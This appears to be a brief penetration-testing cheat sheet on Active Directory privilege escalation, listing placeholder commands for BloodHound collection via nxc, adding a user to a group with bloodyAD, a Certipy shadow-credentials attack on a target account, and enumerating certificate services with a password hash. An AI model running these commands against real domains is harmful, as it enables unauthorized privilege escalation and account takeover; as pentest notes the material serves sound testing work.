Escalation
NXC
Gathering Data for Bloodhound to find escalation paths
nxc ldap [ds-host] -u [username] -p '[password]' --bloodhound --dns-server [dns ip] --collection allBloodyAD
bloodyAD --host [dc-host] -d [domain] -u [username] -p '[password]' add groupMember "[Group Name]" [username]
Certipy
ntpdate [domain]
certipy-ad shadow auto -username [username]@[domain] -password '[password]' -account [target account]Getting Common Name of CA
NXC
nxc ldap [dc-host] -u [username] -H [user hash] -M adcs Certutil
Bloodhound
Find Vulnerable Templates
Links
Last updated